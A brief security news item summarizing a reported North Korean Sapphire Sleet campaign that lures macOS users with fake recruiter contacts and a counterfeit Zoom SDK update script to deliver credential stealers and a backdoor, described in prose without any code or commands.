New Sapphire Sleet attack against macOS users detailed

The Register reports that North Korean hacking operation Sapphire Sleet, also known as APT38, has sought to compromise macOS users with credential- and cryptocurrency-stealing payloads as part of a new social engineering attack campaign.

Fake recruiter profiles on LinkedIn and other social networking sites have been leveraged by Sapphire Sleet to deliver a counterfeit Zoom support meeting invitation, which lures recipients into downloading the seemingly legitimate "Zoom SDK Update.scpt" file, which injects thousands of blank lines to conceal illicit activity, according to a Microsoft analysis. After deploying a command invoking the legitimate macOS softwareupdate binary with an invalid parameter, the script proceeds to use curl to run a malicious payload retrieving another attacker-controlled script that ensures the execution of increasingly complex payloads.

Aside from deploying a credential stealer that exfiltrates data via Telegram Bot API, the campaign also involved the icloudz backdoor that enabled further in-memory delivery of additional payloads. Apple was noted to have adopted additional "platform-level protections" against the campaign after being informed by Microsoft.